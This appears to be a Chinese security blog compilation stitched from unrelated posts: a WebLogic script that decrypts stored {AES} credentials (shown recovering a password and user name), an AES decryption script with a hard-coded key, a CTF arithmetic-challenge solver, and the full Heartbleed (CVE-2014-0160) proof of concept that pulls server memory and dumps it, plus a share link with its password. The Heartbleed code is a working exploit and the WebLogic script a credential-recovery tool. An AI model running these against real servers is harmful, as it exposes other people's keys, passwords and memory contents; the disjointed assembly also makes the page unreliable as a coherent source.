WebLogic 密码恢复

Title : How to recover the Password in WebLogic Server

Follow the steps below to recover a password in WebLogic Server.

Step 1:

Run setWlstEnv.sh for setting up the environment variables.

Ex:-

. /u01/Middleware/oracle_common/common/bin/setWlstEnv.sh

Step 2:

weblogic password recover command –

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:p0o9i8u7
========================================

Step 3:

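WebLogic user name recovery command (the script prints every decrypted value under the label "Decrypted Password", so the value shown below is the user name) –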

[oracle@localhost bin]$ /opt/installations/tools/jdk1.7.0_55/bin/java weblogic.WLST decryptpassword.py /opt/ntdomain/domains/NT {AES}WsnwdqROocsh6D1YOclnc1ySRyzheBNtZD2AGLnjIFM\=

Initializing WebLogic Scripting Tool (WLST) …

Welcome to WebLogic Server Administration Scripting Shell

Type help() for help on available commands
========================================
Decrypted Password:weblogic
========================================

 

 

decryptpassword.py:

import os
import weblogic.security.internal.SerializedSystemIni
import weblogic.security.internal.encryption.ClearOrEncryptedService
 
def decryptString(domainPath, encryptedString):
    """Decrypt a WebLogic-encrypted value and print the cleartext.

    domainPath      -- domain directory handed to
                       SerializedSystemIni.getEncryptionService().
    encryptedString -- the encrypted value to decrypt (the examples on this
                       page pass "{AES}..." strings).

    Nothing is returned; the cleartext is written to stdout between two
    70-character "=" rules.

    NOTE(review): the only inputs are the domain directory and the encrypted
    string, so anyone who can read both can recover the cleartext
    (presumably the key material is the domain's
    security/SerializedSystemIni.dat -- confirm). File permissions on the
    domain directory are what protect these values. The cleartext also ends
    up in terminal scrollback and in any captured output.
    """
    rule = "=" * 70
    encryptionService = weblogic.security.internal.SerializedSystemIni.getEncryptionService(domainPath)
    clearOrEncrypted = weblogic.security.internal.encryption.ClearOrEncryptedService(encryptionService)
    clearText = clearOrEncrypted.decrypt(encryptedString)
    print rule
    print " " * 10 + "Decrypted Password:" + clearText
    print rule
 
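# Script entry: expects exactly two arguments after the script name,
# the domain directory and the encrypted string.
# The WLST shell may already provide sys; importing it explicitly keeps the
# argument check and the error handler from failing with a NameError.
import sys

try:
    if len(sys.argv) == 3:
        decryptString(sys.argv[1], sys.argv[2])
    else:
        print "=" * 70
        print "INVALID ARGUMENTS"
        # Name both required arguments so the usage line is actionable.
        print "Usage: java weblogic.WLST %s <DOMAIN_HOME> <ENCRYPTED_STRING>" % sys.argv[0]
        print "example.:"
        print "    java weblogic.WLST %s /oracle/fmwhome/user_projects/domains/NT/ {AES}68+XWFqzaQdP5DmEgmkJZWnRWtIvjBd7v+y6h49tCd0\=" %sys.argv[0]
        print "=" * 70
except:
    # Catch-all is deliberate: report the exception type, dump the stack,
    # then re-raise so the failure is not hidden.
    print "Unexpected error: ", sys.exc_info()[0]
    # dumpStack() is not defined in this script; it is expected to be
    # supplied by the WLST shell.
    dumpStack()
    raise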

AES解密脚本(Python)

# coding=utf-8
from M2Crypto.EVP import Cipher
from M2Crypto import m2  
from M2Crypto import util  
import urllib
import sys
import base64
import binascii
import Crypto
import Crypto.Random
import array
from Crypto.Cipher import AES  
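ENCRYPT_OP = 1  # value passed as Cipher(op=...) to encrypt
DECRYPT_OP = 0  # value passed as Cipher(op=...) to decrypt

# Fixed 16-byte IV handed to the aes_128_cbc cipher in Encrypt() and Decrypt().
# (An earlier all-zero placeholder assignment was dead code: it was
# overwritten before any use, and its comment referred to ECB mode.)
# NOTE(review): with CBC, reusing one constant IV makes equal plaintext
# prefixes produce equal ciphertext prefixes. That is acceptable only for
# decrypting data produced by an existing system; new data should use a
# random IV per message.
iv_arr = b'\x01\x01\x0b\x05\x04\x0f\x07\x09\x17\x03\x01\x06\x08\x0c\x0d\x5b'
iv = iv_arr

# Secret key, hard-coded in the source.
# NOTE(review): a key embedded in a script is readable by anyone who can read
# the file. 'mymiyao' is also 7 characters, shorter than the 16 bytes
# aes_128_cbc uses -- confirm how M2Crypto treats a short key.
PRIVATE_KEY = 'mymiyao'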
  
def Encrypt(data):
  """Encrypt data with aes_128_cbc and return the ciphertext as uppercase hex.

  The key and IV are the module-level PRIVATE_KEY and iv.
  """
  cipher = Cipher(alg = 'aes_128_cbc', key = PRIVATE_KEY, iv = iv, op = ENCRYPT_OP)
  encrypted = cipher.update(data) + cipher.final()
  del cipher
  # Render each ciphertext byte as two uppercase hex digits.
  return ''.join(['%02X' % (ord(ch)) for ch in encrypted])
  
def Decrypt(data):
  """Decrypt hex-encoded aes_128_cbc ciphertext and return the plaintext.

  The key and IV are the module-level PRIVATE_KEY and iv.
  """
  # Hex text -> raw ciphertext bytes.
  raw = util.h2b(data)
  cipher = Cipher(alg = 'aes_128_cbc', key = PRIVATE_KEY, iv = iv, op = DECRYPT_OP)
  plain = cipher.update(raw)
  plain += cipher.final()
  del cipher
  return plain
# Command-line driver: argv[1] is URL-encoded base64 ciphertext.
# Undo the URL quoting, base64-decode it, then hand Decrypt() the hex form
# it expects and print the recovered plaintext.
unquoted_arg = urllib.unquote(sys.argv[1])
data = base64.decodestring(unquoted_arg).encode('hex')
print Decrypt(data)

#encrypt_data= Encrypt(data)
#encrypt_data=data.decode('hex')
#encrypt_data=base64.encodestring(encrypt_data)
#print encrypt_data

Hackinglab脚本关 快速口算 Python解法

分值:350

小明要参加一个高技能比赛,要求每个人都要能够快速口算四则运算,2秒钟之内就能够得到结果,但是小明就是一个小学生没有经过特殊的培训,那小明能否通过快速口算测验呢?

http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php
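#!/usr/bin/env python
# Fetch the arithmetic challenge page, compute the expression it shows and
# post the result back in the same PHP session.
__author__ = 'black_mia'
import urllib2
import urllib
import re
url='http://lab1.xseclab.com/xss2_0d557e6d2a4ac08b749b61473a075be1/index.php'
# Both requests must carry the same session cookie so the server matches the
# answer to the expression it issued.
SESSION_COOKIE = 'PHPSESSID=e6a4c74121e5df77165a2a0a00ca6e6c'
# Characters allowed to reach eval(): digits, whitespace, decimal point,
# the four arithmetic operators and parentheses.
_ARITH_ONLY = re.compile(r'^[\d\s.+\-*/()]+$')

req=urllib2.Request(url)
req.add_header("Cookie",SESSION_COOKIE)
f=urllib2.urlopen(req)
try:
    page=f.read()
finally:
    f.close()

matches=re.search("(.*)=<input",page)
if matches is None:
    raise ValueError("challenge expression not found in the response")
expr=matches.group(1)
# NOTE(review): the expression arrives over plain HTTP, so the server or
# anyone on the path controls what is evaluated. eval() on that text would
# run arbitrary Python on this machine; only pure arithmetic is let through,
# and '**' is rejected because a tower of exponents can hang the interpreter.
if not _ARITH_ONLY.match(expr) or '**' in expr:
    raise ValueError("refusing to eval non-arithmetic text: %r" % expr)
data={'v':str(eval(expr))}
data=urllib.urlencode(data)

req=urllib2.Request(url,data)
req.add_header("Cookie",SESSION_COOKIE)
f=urllib2.urlopen(req)
try:
    body=f.read()
finally:
    f.close()

matches=re.search("<body>(.*)<\/body>",body)
if matches is None:
    raise ValueError("no <body> element found in the reply")
print matches.group(1)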

OpenSSL”心脏出血”漏洞检测利用代码-又是一个黑客的不眠之夜-切勿用于非法目的!

OpenSSL的这个漏洞还是比较严重的,经过检测,博主自己的几个站点的主机商提供的空间均存在该问题,而且博主也采用SSL方式访问这些站点,故需要立即撤下SSL私钥证书,以避免被窃取,暂时采用非SSL方式访问,等待主机商修复该问题。主机商修复后,还应重新生成私钥并吊销、重新签发证书,因为旧私钥可能已经泄露。

POC代码如下:

#!/usr/bin/python

# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford (jspenguin@jspenguin.org)
# The author disclaims copyright to this source code.

import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser

# Command-line interface: one positional server name and an optional port.
options = OptionParser(
    usage='%prog server [options]',
    description='Test for SSL heartbeat vulnerability (CVE-2014-0160)',
)
options.add_option(
    '-p', '--port',
    type='int',
    default=443,
    help='TCP port to test (default: 443)',
)

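def h2bin(x):
    """Convert a hex dump laid out with spaces and newlines into raw bytes.

    Spaces and newline characters are removed, then the remaining text is
    decoded as hexadecimal. Decoding goes through binascii.unhexlify rather
    than the str 'hex' codec, which exists only on Python 2; the result on
    Python 2 is the same byte string.
    """
    import binascii  # local import: only this helper needs it

    compact = x.replace(' ', '').replace('\n', '')
    return binascii.unhexlify(compact)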

# Pre-built TLS record holding a ClientHello: record type 0x16 (handshake),
# version bytes 03 02, handshake message type 0x01. The last extension in
# the message, 00 0f 00 01 01, is the heartbeat extension (type 15), which
# announces that this client is willing to exchange heartbeat messages.
hello = h2bin('''
16 03 02 00  dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc  0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03  90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22  c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35  00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d  c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32  00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96  00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15  00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff  01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34  00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09  00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15  00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f  00 10 00 11 00 23 00 00
00 0f 00 01 01                                  
''')

# Heartbeat record used as the probe: record type 0x18 (24), version bytes
# 03 02, record length 3. The 3-byte body is 01 (heartbeat request) followed
# by 40 00, a declared payload length of 0x4000, with no payload bytes
# actually present. hit_hb() treats a reply longer than 3 bytes as the sign
# that the server echoed memory it was never sent (CVE-2014-0160).
hb = h2bin(''' 
18 03 02 00 03
01 40 00
''')

def hexdump(s):
    """Print s as rows of 16 bytes: offset, hex values and printable ASCII.

    Bytes outside 32..126 are shown as '.' in the ASCII column. A blank
    line is printed after the last row.

    NOTE(review): when called on a heartbeat reply from a vulnerable server
    the dump is server memory and may contain credentials or key material;
    treat saved output as sensitive.
    """
    offset = 0
    while offset < len(s):
        row = list(s[offset:offset + 16])
        hex_column = ' '.join(['%02X' % ord(ch) for ch in row])
        text_column = ''.join([ch if 32 <= ord(ch) <= 126 else '.' for ch in row])
        print '  %04x: %-48s %s' % (offset, hex_column, text_column)
        offset += 16
    print

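def recvall(s, length, timeout=5):
    """Read exactly `length` bytes from socket `s`, or give up.

    Returns the bytes read, or None when the peer closes the connection or
    `timeout` seconds pass before `length` bytes have arrived. A `length`
    of 0 returns an empty byte string without touching the socket.
    """
    deadline = time.time() + timeout
    chunks = []
    remain = length
    while remain > 0:
        rtime = deadline - time.time()
        if rtime < 0:
            return None
        # Wait only for the time that is left, so `timeout` is a real upper
        # bound instead of being overshot by a fixed 5-second wait per round.
        readable, _, _ = select.select([s], [], [], rtime)
        if s in readable:
            data = s.recv(remain)
            # An empty read means the peer closed the connection.
            if not data:
                return None
            chunks.append(data)
            remain -= len(data)
    # Join once at the end instead of growing a string chunk by chunk.
    return b''.join(chunks)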

def recvmsg(s):
    """Read one TLS record from socket `s`.

    Reads the 5-byte record header (type, version, length), then `length`
    bytes of payload. Returns (type, version, payload), or
    (None, None, None) if either read fails. The payload length comes from
    the peer's header; the '>BHH' format limits it to 16 bits.
    """
    failure = (None, None, None)

    header = recvall(s, 5)
    if header is None:
        print 'Unexpected EOF receiving record header - server closed connection'
        return failure

    typ, ver, ln = struct.unpack('>BHH', header)
    payload = recvall(s, ln, 10)
    if payload is None:
        print 'Unexpected EOF receiving record payload - server closed connection'
        return failure

    print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(payload))
    return typ, ver, payload

def hit_hb(s):
    """Send the heartbeat probe on `s` and classify the server's reply.

    Returns True when a heartbeat response (record type 24) is received,
    False when an alert (record type 21) arrives or no record can be read.
    Other record types are skipped and the loop keeps reading.

    A heartbeat reply longer than 3 bytes is reported as vulnerable: the
    probe declared a payload it never sent, so any extra bytes came from
    server memory. A host reported vulnerable needs a patched OpenSSL
    build, and keys and credentials it served should be treated as exposed.
    """
    s.send(hb)
    while True:
        typ, ver, pay = recvmsg(s)

        if typ is None:
            print 'No heartbeat response received, server likely not vulnerable'
            return False
        elif typ == 21:
            # TLS alert record.
            print 'Received alert:'
            hexdump(pay)
            print 'Server returned error, likely not vulnerable'
            return False
        elif typ == 24:
            # Heartbeat record.
            print 'Received heartbeat response:'
            hexdump(pay)
            extra_data = len(pay) > 3
            if extra_data:
                print 'WARNING: server returned more data than it should - server is vulnerable!'
            else:
                print 'Server processed malformed heartbeat, but did not return any extra data.'
            return True

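def main():
    """Connect to the server named on the command line and run the check.

    Sends the ClientHello, reads records until a handshake record whose
    first byte is 0x0E (ServerHelloDone) arrives, then sends the heartbeat
    probe and lets hit_hb() report the outcome. Prints help and returns if
    no server argument is given. The socket is always closed on exit.

    NOTE(review): the ServerHelloDone test looks only at the first byte of
    each record, so a server that packs several handshake messages into one
    record is reported as "closed connection without sending Server Hello".
    A negative result from this script is therefore not proof that a host
    is patched.
    """
    opts, args = options.parse_args()
    if len(args) < 1:
        options.print_help()
        return

    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        print 'Connecting...'
        sys.stdout.flush()
        s.connect((args[0], opts.port))
        print 'Sending Client Hello...'
        sys.stdout.flush()
        s.send(hello)
        print 'Waiting for Server Hello...'
        sys.stdout.flush()
        while True:
            typ, ver, pay = recvmsg(s)
            if typ is None:
                print 'Server closed connection without sending Server Hello.'
                return
            # Look for server hello done message. The `pay and` guard keeps
            # an empty handshake record from raising IndexError.
            if typ == 22 and pay and ord(pay[0]) == 0x0E:
                break

        print 'Sending heartbeat request...'
        sys.stdout.flush()
        # hit_hb() sends the same heartbeat record again before it reads.
        s.send(hb)
        hit_hb(s)
    finally:
        # Release the connection on every exit path, including errors.
        s.close()

if __name__ == '__main__':
    main()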

链接: http://pan.baidu.com/s/1ntiC5Ix 密码: quu1